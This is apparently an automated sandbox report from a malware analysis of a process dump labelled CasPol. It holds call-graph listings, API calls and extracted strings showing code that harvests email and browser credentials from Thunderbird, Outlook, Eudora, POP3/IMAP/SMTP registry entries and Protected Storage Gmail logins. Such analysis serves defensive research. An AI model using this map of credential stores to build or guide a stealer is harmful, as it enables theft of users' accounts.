33952 4108be memcpy CoTaskMemFree 33951->33952 33952->33950 33953->33753 33954->33746 33956 40841c 33955->33956 33957 410a9c RegOpenKeyExA 33956->33957 33957->33762 33958->33768 33959->33768 33960->33772 33961->33774 33962->33768 33963->33777 33964->33783 33965->33783 33966->33786 33967->33783 33969 404656 FreeLibrary 33968->33969 33970 4045e3 LoadLibraryA 33969->33970 33971 404651 33970->33971 33972 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33970->33972 33971->33790 33971->33792 33971->33794 33973 40463d 33972->33973 33974 404643 33973->33974 33975 404656 FreeLibrary 33973->33975 33974->33971 33975->33971 33977 403cd2 33976->33977 33978 40465c FreeLibrary 33976->33978 33977->33804 33978->33977 33979->33801 33980->33808 33981->33822 33982->33816 33983->33822 33984->33822 33985->33817 33986->33822 33987->33830 33988->33830 33998 410b62 RegEnumKeyExA 33989->33998 33991 402b15 RegCloseKey 33991->33830 33995 402ad0 33995->33991 33996 402b14 33995->33996 33999 410a9c RegOpenKeyExA 33995->33999 34000 402a14 memset 33995->34000 34008 410b62 RegEnumKeyExA 33995->34008 33996->33991 33997->33830 33998->33995 33999->33995 34009 410b62 RegEnumKeyExA 34000->34009 34002 402a93 RegCloseKey 34002->33995 34004 402a48 34004->34002 34010 410a9c RegOpenKeyExA 34004->34010 34011 4027be 34004->34011 34026 410b62 RegEnumKeyExA 34004->34026 34008->33995 34009->34004 34010->34004 34012 40285a memset 34011->34012 34027 4029a2 RegQueryValueExA 34012->34027 34014 402885 34014->34012 34015 402998 RegCloseKey 34014->34015 34033 4021b6 memset 34014->34033 34015->34004 34017 402898 _mbscpy 34018 4029a2 4 API calls 34017->34018 34022 4028d4 34018->34022 34019 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34019->34022 34020 410ab6 RegQueryValueExA 34020->34022 34022->34019 34022->34020 34034 401989 _mbscpy _mbscat _mbscat 34022->34034 34035 402624 10 API calls 34022->34035 34024 40296d _mbscpy 34036 4023e5 16 API calls 34024->34036 34026->34004 34028 4029dd 34027->34028 34032 4029f2 34027->34032 34029 4029f7 WideCharToMultiByte 34028->34029 34030 4029e9 34028->34030 34029->34032 34031 406f06 2 API calls 34030->34031 34031->34032 34032->34014 34033->34017 34034->34022 34035->34024 34036->34014 34037->33838 34038->33851 34039->33851 34040->33851 34041->33851 34042->33856 34043->33858 34044->33859 34045->33863 34046->33864 34047->33864 34048->33873 34049->33870 34050->33879 34089 4078ba 34051->34089 34054 4078ba _mbsnbcat 34055 40f5a3 RegOpenKeyExA 34054->34055 34056 40f5c3 RegQueryValueExA 34055->34056 34057 40f6d9 34055->34057 34058 40f6d0 RegCloseKey 34056->34058 34059 40f5f0 34056->34059 34057->33879 34058->34057 34059->34058 34060 40f675 34059->34060 34093 40466b _mbscpy 34059->34093 34060->34058 34094 4012ee strlen 34060->34094 34062 40f611 34064 404734 3 API calls 34062->34064 34069 40f616 34064->34069 34065 40f69e RegQueryValueExA 34065->34058 34066 40f6c1 34065->34066 34066->34058 34067 40f66a 34068 404785 FreeLibrary 34067->34068 34068->34060 34069->34067 34070 40f661 LocalFree 34069->34070 34071 40f645 memcpy 34069->34071 34070->34067 34071->34070 34095 40466b _mbscpy 34072->34095 34074 40f6fa 34075 4045db 7 API calls 34074->34075 34076 40f708 34075->34076 34077 404734 3 API calls 34076->34077 34082 40f7e2 34076->34082 34083 40f715 34077->34083 34078 404656 FreeLibrary 34079 40f7f1 34078->34079 34080 404785 FreeLibrary 34079->34080 34081 40f7fc 34080->34081 34081->33879 34082->34078 34083->34082 34084 40f797 WideCharToMultiByte 34083->34084 34085 40f7b8 strlen 34084->34085 34086 40f7d9 LocalFree 34084->34086 34085->34086 34087 40f7c8 _mbscpy 34085->34087 34086->34082 34087->34086 34088->33879 34090 4078e6 34089->34090 34091 4078c7 _mbsnbcat 34090->34091 34092 4078ea 34090->34092 34091->34090 34092->34054 34093->34062 34094->34065 34095->34074 34109 410a9c RegOpenKeyExA 34096->34109 34098 40381a 34098->33886 34107 4021b6 memset 34098->34107 34099 44458b 34099->34098 34110 410add RegQueryValueExA 34099->34110 34101 4445a4 34102 4445dc RegCloseKey 34101->34102 34111 410add RegQueryValueExA 34101->34111 34102->34098 34104 4445c1 34104->34102 34112 444879 30 API calls 34104->34112 34106 4445da 34106->34102 34107->33889 34108->33886 34109->34099 34110->34101 34111->34104 34112->34106 34113->33910 34115 4075c9 34114->34115 34116 4075bb _mbscat 34114->34116 34117 444212 34115->34117 34116->34115 34133 407e9d 34117->34133 34120 44424d 34121 444274 34120->34121 34141 444196 34120->34141 34152 407ef8 34120->34152 34122 407e9d 9 API calls 34121->34122 34129 4442a0 34122->34129 34124 407ef8 9 API calls 34124->34129 34125 4442ce 34166 407f90 34125->34166 34129->34124 34129->34125 34131 444212 65 API calls 34129->34131 34162 407e62 34129->34162 34130 407f90 FindClose 34132 4442e4 34130->34132 34131->34129 34132->33932 34134 407f90 FindClose 34133->34134 34135 407eaa 34134->34135 34136 406f06 2 API calls 34135->34136 34137 407ebd strlen strlen 34136->34137 34138 407ee1 34137->34138 34139 407eea 34137->34139 34169 4070e3 strlen _mbscat _mbscpy _mbscat 34138->34169 34139->34120 34170 406d01 CreateFileA 34141->34170 34143 4441a1 34144 44420e 34143->34144 34145 4441aa GetFileSize 34143->34145 34144->34120 34146 444203 CloseHandle 34145->34146 34147 4441bd ??2@YAPAXI SetFilePointer 34145->34147 34146->34144 34171 407560 ReadFile 34147->34171 34149 4441e4 34172 444059 34149->34172 34153 407f03 FindFirstFileA 34152->34153 34154 407f24 FindNextFileA 34152->34154 34155 407f3f 34153->34155 34156 407f46 strlen strlen 34154->34156 34157 407f3a 34154->34157 34155->34156 34160 407f7f 34155->34160 34158 407f76 34156->34158 34156->34160 34159 407f90 FindClose 34157->34159 34203 4070e3 strlen _mbscat _mbscpy _mbscat 34158->34203 34159->34155 34160->34120 34163 407e94 34162->34163 34164 407e6c strcmp 34162->34164 34163->34129 34164->34163 34165 407e83 strcmp 34164->34165 34165->34163 34167 407fa3 34166->34167 34168 407f99 FindClose 34166->34168 34167->34130 34168->34167 34169->34139 34170->34143 34171->34149 34173 44b090 34172->34173 34174 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34173->34174 34187 44338b 6 API calls 34174->34187 34176 44409f 34177 4440bf strlen 34176->34177 34188 4434fc ??3@YAXPAX ??2@YAPAXI 34177->34188 34179 4440df memcpy 34189 443607 34179->34189 34181 44413d ??3@YAXPAX 34199 443473 9 API calls 34181->34199 34184 406f06 2 API calls 34184->34181 34186 44418f ??3@YAXPAX 34186->34146 34187->34176 34188->34179 34200 407948 free free 34189->34200 34191 443639 34201 407948 free free 34191->34201 34193 44391c 34193->34181 34193->34184 34194 407a1f 4 API calls 34196 443644 34194->34196 34195 443528 19 API calls 34195->34196 34196->34193 34196->34194 34196->34195 34197 44379d memcpy 34196->34197 34202 442d8e 9 API calls 34196->34202 34197->34196 34199->34186 34200->34191 34201->34196 34202->34196 34203->34160 34204->33520 34205->33524 34206->33531 34207->33530 34208->33537 34209->33534 34210->33529 34212 404785 FreeLibrary 34211->34212 34213 4041b3 34212->34213 34214 410808 FreeLibrary 34213->34214 34215 4041c4 34214->34215 34216 404785 FreeLibrary 34215->34216 34217 4041df 34216->34217 34222 404104 34217->34222 34221 4041eb ??3@YAXPAX 34221->33540 34223 4080d4 free 34222->34223 34224 404111 34223->34224 34225 4080d4 free 34224->34225 34226 40411c 34225->34226 34253 4078ed 34226->34253 34231 404143 34233 407a55 free 34231->34233 34232 404135 SetCurrentDirectoryA 34232->34231 34234 40414b 34233->34234 34235 407a55 free 34234->34235 34236 404153 34235->34236 34237 409a98 34236->34237 34238 409a32 5 API calls 34237->34238 34239 409aa6 34238->34239 34240 409ab9 34239->34240 34241 407a55 free 34239->34241 34243 407a55 free 34240->34243 34244 409acc 34240->34244 34242 409ab2 ??3@YAXPAX 34241->34242 34242->34240 34247 409ac5 ??3@YAXPAX 34243->34247 34245 409adf 34244->34245 34248 407a55 free 34244->34248 34246 409af2 free 34245->34246 34249 407a55 free 34245->34249 34246->34221 34247->34244 34250 409ad8 ??3@YAXPAX 34248->34250 34251 409aeb ??3@YAXPAX 34249->34251 34250->34245 34251->34246 34254 40412a 34253->34254 34255 4078f3 ??3@YAXPAX 34253->34255 34256 404a3a 34254->34256 34255->34254 34257 404a41 34256->34257 34258 40412f 34256->34258 34261 4047cb 11 API calls 34257->34261 34258->34231 34258->34232 34260 404a4c 34260->34258 34261->34260 34270 411853 RtlInitializeCriticalSection memset 34271 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34446 40a256 13 API calls 34448 432e5b 17 API calls 34450 43fa5a 20 API calls 34273 401060 41 API calls 34453 427260 CloseHandle memset memset 34277 410c68 FindResourceA SizeofResource LoadResource LockResource 34455 405e69 14 API calls 34279 433068 15 API calls __fprintf_l 34457 414a6d 18 API calls 34458 43fe6f 134 API calls 34281 424c6d 15 API calls __fprintf_l 34459 426741 19 API calls 34283 440c70 17 API calls 34284 443c71 44 API calls 34287 427c79 24 API calls 34462 416e7e memset __fprintf_l 34291 42800b 47 API calls 34292 425115 85 API calls __fprintf_l 34465 41960c 61 API calls 34293 43f40c 122 API calls __fprintf_l 34296 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34297 43f81a 20 API calls 34299 414c20 memset memset 34300 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34469 414625 18 API calls 34470 404225 modf 34471 403a26 strlen WriteFile 34473 40422a 12 API calls 34477 427632 memset memset memcpy 34478 40ca30 59 API calls 34479 404235 26 API calls 34301 42ec34 61 API calls __fprintf_l 34302 425115 76 API calls __fprintf_l 34480 425115 77 API calls __fprintf_l 34482 44223a 38 API calls 34308 43183c 112 API calls 34483 44b2c5 _onexit __dllonexit 34488 42a6d2 memcpy __allrem 34310 405cda 66 API calls 34496 43fedc 138 API calls 34497 4116e1 16 API calls __fprintf_l 34313 4244e6 19 API calls 34315 42e8e8 127 API calls __fprintf_l 34316 4118ee RtlLeaveCriticalSection 34502 43f6ec 22 API calls 34318 425115 119 API calls __fprintf_l 34319 410cf3 EnumResourceNamesA 34505 4492f0 memcpy memcpy 34507 43fafa 18 API calls 34509 4342f9 15 API calls __fprintf_l 34320 4144fd 19 API calls 34511 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34512 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34515 443a84 _mbscpy 34517 43f681 17 API calls 34323 404487 22 API calls 34519 415e8c 16 API calls __fprintf_l 34327 411893 RtlDeleteCriticalSection __fprintf_l 34328 41a492 42 API calls 34523 403e96 34 API calls 34524 410e98 memset SHGetPathFromIDList SendMessageA 34330 426741 109 API calls __fprintf_l 34331 4344a2 18 API calls 34332 4094a2 10 API calls 34527 4116a6 15 API calls __fprintf_l 34528 43f6a4 17 API calls 34529 440aa3 20 API calls 34531 427430 45 API calls 34335 4090b0 7 API calls 34336 4148b0 15 API calls 34338 4118b4 RtlEnterCriticalSection 34339 4014b7 CreateWindowExA 34340 40c8b8 19 API calls 34342 4118bf RtlTryEnterCriticalSection 34536 42434a 18 API calls __fprintf_l 34538 405f53 12 API calls 34350 43f956 59 API calls 34352 40955a 17 API calls 34353 428561 36 API calls 34354 409164 7 API calls 34542 404366 19 API calls 34546 40176c ExitProcess 34549 410777 42 API calls 34359 40dd7b 51 API calls 34360 425d7c 16 API calls __fprintf_l 34551 43f6f0 25 API calls 34552 42db01 22 API calls 34361 412905 15 API calls __fprintf_l 34553 403b04 54 API calls 34554 405f04 SetDlgItemTextA GetDlgItemTextA 34555 44b301 ??3@YAXPAX 34558 4120ea 14 API calls 3 library calls 34559 40bb0a 8 API calls 34561 413f11 strcmp 34365 434110 17 API calls __fprintf_l 34368 425115 108 API calls __fprintf_l 34562 444b11 _onexit 34370 425115 76 API calls __fprintf_l 34373 429d19 10 API calls 34565 444b1f __dllonexit 34566 409f20 _strcmpi 34375 42b927 31 API calls 34569 433f26 19 API calls __fprintf_l 34570 44b323 FreeLibrary 34571 427f25 46 API calls 34572 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34573 43fb30 19 API calls 34382 414d36 16 API calls 34384 40ad38 7 API calls 34575 433b38 16 API calls __fprintf_l 34576 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34388 426741 21 API calls 34389 40c5c3 125 API calls 34391 43fdc5 17 API calls 34577 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34394 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 33217->33218 34582 43ffc8 18 API calls 34395 4281cc 15 API calls __fprintf_l 34584 4383cc 110 API calls __fprintf_l 34396 4275d3 41 API calls 34585 4153d3 22 API calls __fprintf_l 34397 444dd7 _XcptFilter 34590 4013de 15 API calls 34592 425115 111 API calls __fprintf_l 34593 43f7db 18 API calls 34596 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34399 4335ee 16 API calls __fprintf_l 34598 429fef 11 API calls 34400 444deb _exit _c_exit 34599 40bbf0 139 API calls 34403 425115 79 API calls __fprintf_l 34603 437ffa 22 API calls 34407 4021ff 14 API calls 34408 43f5fc 149 API calls 34604 40e381 9 API calls 34410 405983 40 API calls 34411 42b186 27 API calls __fprintf_l 34412 427d86 76 API calls 34413 403585 20 API calls 34415 42e58e 18 API calls __fprintf_l 34418 425115 75 API calls __fprintf_l 34420 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34608 434395 16 API calls 34422 441d9c memcmp 34610 43f79b 119 API calls 34423 40c599 43 API calls 34611 426741 87 API calls 34427 4401a6 21 API calls 34429 426da6 memcpy memset memset memcpy 34430 4335a5 15 API calls 34432 4299ab memset memset memcpy memset memset 34433 40b1ab 8 API calls 34616 425115 76 API calls __fprintf_l 34620 4113b2 18 API calls 2 library calls 34624 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 33233->33236 33235->33228 33236->33233 34435 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                                                    • API String ID: 379999529-620537770
                                                                                                                                                                                                                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                      • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                    • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 52128907-4223776976
                                                                                                                                                                                                                    • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                                                    • Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
